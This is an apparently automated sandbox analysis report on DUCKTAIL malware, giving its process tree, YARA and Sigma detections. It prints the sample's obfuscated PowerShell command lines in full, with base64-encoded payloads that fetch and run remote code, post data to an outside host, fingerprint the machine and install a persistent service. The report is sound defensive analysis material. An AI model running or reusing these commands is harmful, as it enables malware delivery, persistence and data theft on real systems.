    • cmd.exe (PID: 1688 cmdline: "cmd.exe" /c sc query myRdpService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • sc.exe (PID: 7408 cmdline: sc query myRdpService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 7816 cmdline: "cmd.exe" /c sc stop "myRdpService" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • sc.exe (PID: 1884 cmdline: sc stop "myRdpService" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 3164 cmdline: "cmd.exe" /c sc query myRdpService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • sc.exe (PID: 2472 cmdline: sc query myRdpService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 980 cmdline: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • sc.exe (PID: 2492 cmdline: sc delete "myRdpService" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • sc.exe (PID: 1932 cmdline: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • net.exe (PID: 1804 cmdline: net start "myRdpService" MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
        • net1.exe (PID: 7360 cmdline: C:\Windows\system32\net1 start "myRdpService" MD5: BA0BCCC6029FBBE6D8B41197F252742F)
    • powershell.exe (PID: 5324 cmdline: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA== MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • myRdpService.exe (PID: 5032 cmdline: C:\Windows\Temp\myRdpService.exe cakoi10 MD5: F651568CD1F1A7ABAEDD4389DA3A2F14)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DUCKTAILAccording to Tony Lambert, this is a malware written in .NET. It was observed to be delivered using the .NET Single File deployment feature.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.ducktail

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
U82W1yZAYQ.lnkJoeSecurity_ObfuscatedPowershellYara detected Obfuscated PowershellJoe Security
    U82W1yZAYQ.lnkSUSP_PowerShell_Caret_Obfuscation_2Detects powershell keyword obfuscated with caretsFlorian Roth
    • 0x86:$r1: P^oWer^s^H^eL^l
    • 0x86:$r2: P^oWer^s^H^eL^l

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000002.00000002.2740483057.000001AC2023A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Ducktail_11Yara detected DucktailJoe Security
      0000002D.00000002.3845244582.00007FF7A6116000.00000004.00000001.01000000.0000000A.sdmphacktool_windows_moyix_creddumpcreddump is a python tool to extract credentials and secrets from Windows registry hives.@mimeframe
      • 0xdac4:$a1: !@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%
      • 0x11f94:$a2: 0123456789012345678901234567890123456789
      • 0x328ac:$a3: NTPASSWORD
      • 0x2f774:$a4: LMPASSWORD
      • 0x5cc54:$a5: aad3b435b51404eeaad3b435b51404ee
      • 0x14f54:$a6: 31d6cfe0d16ae931b73c59d7e0c089c0
      Process Memory Space: powershell.exe PID: 2012INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0xe8d33:$b1: ::WriteAllBytes(
      • 0x20da6a:$b1: ::WriteAllBytes(
      • 0xeb18b:$b2: ::FromBase64String(
      • 0x157b59:$b2: ::FromBase64String(
      • 0x15828d:$b2: ::FromBase64String(
      • 0x1584d6:$b2: ::FromBase64String(
      • 0x1586a2:$b2: ::FromBase64String(
      • 0x1587f6:$b2: ::FromBase64String(
      • 0x158862:$b2: ::FromBase64String(
      • 0x1588c4:$b2: ::FromBase64String(
      • 0x158930:$b2: ::FromBase64String(
      • 0x15898d:$b2: ::FromBase64String(
      • 0x158a1c:$b2: ::FromBase64String(
      • 0x158a8b:$b2: ::FromBase64String(
      • 0x158afc:$b2: ::FromBase64String(
      • 0x158b5d:$b2: ::FromBase64String(
      • 0x158bc4:$b2: ::FromBase64String(
      • 0x158c1e:$b2: ::FromBase64String(
      • 0x158c9a:$b2: ::FromBase64String(
      • 0x158d06:$b2: ::FromBase64String(
      • 0x158d71:$b2: ::FromBase64String(
      Process Memory Space: powershell.exe PID: 3372INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0x1affe:$b1: ::WriteAllBytes(
      • 0x98cb:$b2: ::FromBase64String(
      • 0xc160:$b2: ::FromBase64String(
      • 0xc7d4:$b2: ::FromBase64String(
      • 0xc847:$b2: ::FromBase64String(
      • 0x1245b:$b2: ::FromBase64String(
      • 0xadba5:$b3: ::UTF8.GetString(
      • 0x51dfc:$s1: -join
      • 0x526ff:$s1: -join
      • 0x134607:$s1: -join
      • 0x43bac:$s3: Reverse
      • 0x43bb4:$s3: Reverse
      • 0x21596f:$s3: Reverse
      • 0x21d916:$s3: Reverse
      • 0x21d935:$s3: Reverse
      • 0x2213ea:$s3: Reverse
      • 0x22142f:$s3: Reverse
      • 0x22a190:$s3: Reverse
      • 0x22a1a9:$s3: Reverse
      • 0x22dd2d:$s3: Reverse
      • 0x2ab635:$s3: reverse
      Process Memory Space: svczHost.exe PID: 9104JoeSecurity_Ducktail_6Yara detected DucktailJoe Security
        Click to see the 2 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        45.2.myRdpService.exe.7ff7a5c10000.0.unpackhacktool_windows_moyix_creddumpcreddump is a python tool to extract credentials and secrets from Windows registry hives.@mimeframe
        • 0x5118c4:$a1: !@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%
        • 0x515d94:$a2: 0123456789012345678901234567890123456789
        • 0x5366ac:$a3: NTPASSWORD
        • 0x533574:$a4: LMPASSWORD
        • 0x560a54:$a5: aad3b435b51404eeaad3b435b51404ee
        • 0x518d54:$a6: 31d6cfe0d16ae931b73c59d7e0c089c0

        Other

        SourceRuleDescriptionAuthorStrings
        amsi64_3372.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0xc5e7:$b1: ::WriteAllBytes(
        • 0x8a39:$b2: ::FromBase64String(
        • 0xb2cf:$b2: ::FromBase64String(
        • 0xb944:$b2: ::FromBase64String(
        • 0x52e:$b3: ::UTF8.GetString(
        • 0x868d:$s1: -join
        • 0x23e:$s4: +=
        • 0x261:$s4: +=
        • 0x1e39:$s4: +=
        • 0x1efb:$s4: +=
        • 0x6122:$s4: +=
        • 0x823f:$s4: +=
        • 0x8529:$s4: +=
        • 0x866f:$s4: +=
        • 0xbb01:$s4: +=
        • 0xbcfe:$s4: +=
        • 0xdfbe:$s4: +=
        • 0x5e9d1:$s4: +=
        • 0x6347a:$s4: +=
        • 0x634fa:$s4: +=
        • 0x635c0:$s4: +=

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\cmd.exe" /v /k "S^T^aR^T /M^I^n "" P^oWer^s^H^eL^l -W H^iDde^n -No^l^OGO -N^o^p -ep B^YPA^sS -eN^c^oDe^d^cOmMAn^d "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABpAE4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIAaQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHQAUgAiACkAKQApACkALgBDAG8ATgBUAGUATgB0ACkAKQA="" && exit, CommandLine: "C:\Windows\system32\cmd.exe" /v /k "S^T^aR^T /M^I^n "" P^oWer^s^H^eL^l -W H^iDde^n -No^l^OGO -N^o^p -ep B^YPA^sS -eN^c^oDe^d^cOmMAn^d "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABpAE4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIAaQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHQAUgAiACkAKQApACkALgBDAG8ATgBUAGUATgB0ACkAKQA="" && exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5100, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /v /k "S^T^aR^T /M^I^n "" P^oWer^s^H^eL^l -W H^iDde^n -No^l^OGO -N^o^p -ep B^YPA^sS -eN^c^oDe^d^cOmMAn^d "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABpAE4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIAaQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHQAUgAiACkAKQApACkALgBDAG8ATgBUAGUATgB0ACkAKQA="" && exit, ProcessId: 3200, ProcessName: cmd.exe
        Sigma detected: PowerShell Base64 Encoded IEX Cmdlet
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\cmd.exe" /v /k "S^T^aR^T /M^I^n "" P^oWer^s^H^eL^l -W H^iDde^n -No^l^OGO -N^o^p -ep B^YPA^sS -eN^c^oDe^d^cOmMAn^d "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABpAE4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIAaQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHQAUgAiACkAKQApACkALgBDAG8ATgBUAGUATgB0ACkAKQA="" && exit, CommandLine: "C:\Windows\system32\cmd.exe" /v /k "S^T^aR^T /M^I^n "" P^oWer^s^H^eL^l -W H^iDde^n -No^l^OGO -N^o^p -ep B^YPA^sS -eN^c^oDe^d^cOmMAn^d "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABpAE4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIAaQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHQAUgAiACkAKQApACkALgBDAG8ATgBUAGUATgB0ACkAKQA="" && exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5100, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /v /k "S^T^aR^T /M^I^n "" P^oWer^s^H^eL^l -W H^iDde^n -No^l^OGO -N^o^p -ep B^YPA^sS -eN^c^oDe^d^cOmMAn^d "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABpAE4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIAaQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHQAUgAiACkAKQApACkALgBDAG8ATgBUAGUATgB0ACkAKQA="" && exit, ProcessId: 3200, ProcessName: cmd.exe
        Sigma detected: PowerShell Base64 Encoded Invoke Keyword
        Source: Process startedAuthor: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t: Data: Command: powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8AMABmAGQAYQBhADAAMwA4AGEAZAA2AGMAMgBlAGUAYQA0ADUAMQAwADIAZQA3AGMAYQA5AGYAYQA0ADEANgA3ADgANQA4AGUAZgBlADkAZAA3ADkAOQA1AGYAMABjAGYANAAyAGYAMQBkAGEAOAAwADkAMAA0ADAAMgBjAGUAZgBjADIANQA1ADQAZABkAGQAYQBjAGQAMAAyAGEAYgBjADcAZgA5ADEAZABhADYANwA1ADEAYwBjAGMAZQA5ADAAZABkADQAOAA4ADcAYgAxADEANgA0ADUANQBlADQAOQBiAGUAOAAxAGQAYgAxADAAZgA4ADAAYgBhAGEAMQAxAGEANAAyADQAZgAwADAANQBkADYAZABiAGQAYQBkADcANQA0ADgANwA2AGQANQA5AGUANQBmADQANgAwAGIAMQBjADQAZgBmAGIAYQA5AGMAZABkADEAYQA0AGMAMwA5ADcAMAA1ADUAYQAwADIAOABlADAAMgA2ADIAMQBlADYAZAA0AGMAZQAxADQANABlADAAZgBlADgAMQA4AGIANwAwAGUANgAyADEAYwA5AGYANABmADgANwA2ADcAOQAxACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQB
        Sigma detected: PowerShell Base64 Encoded WMI Classes
        Source: Process startedAuthor: Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA, CommandLine: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -Execution
        Sigma detected: Suspicious Encoded PowerShell Command Line
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8AMABmAGQAYQBhADAAMwA4AGEAZAA2AGMAMgBlAGUAYQA0ADUAMQAwADIAZQA3AGMAYQA5AGYAYQA0ADEANgA3ADgANQA4AGUAZgBlADkAZAA3ADkAOQA1AGYAMABjAGYANAAyAGYAMQBkAGEAOAAwADkAMAA0ADAAMgBjAGUAZgBjADIANQA1ADQAZABkAGQAYQBjAGQAMAAyAGEAYgBjADcAZgA5ADEAZABhADYANwA1ADEAYwBjAGMAZQA5ADAAZABkADQAOAA4ADcAYgAxADEANgA0ADUANQBlADQAOQBiAGUAOAAxAGQAYgAxADAAZgA4ADAAYgBhAGEAMQAxAGEANAAyADQAZgAwADAANQBkADYAZABiAGQAYQBkADcANQA0ADgANwA2AGQANQA5AGUANQBmADQANgAwAGIAMQBjADQAZgBmAGIAYQA5AGMAZABkADEAYQA0AGMAMwA5ADcAMAA1ADUAYQAwADIAOABlADAAMgA2ADIAMQBlADYAZAA0AGMAZQAxADQANABlADAAZgBlADgAMQA4AGIANwAwAGUANgAyADEAYwA5AGYANABmADgANwA2ADcAOQAxACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBU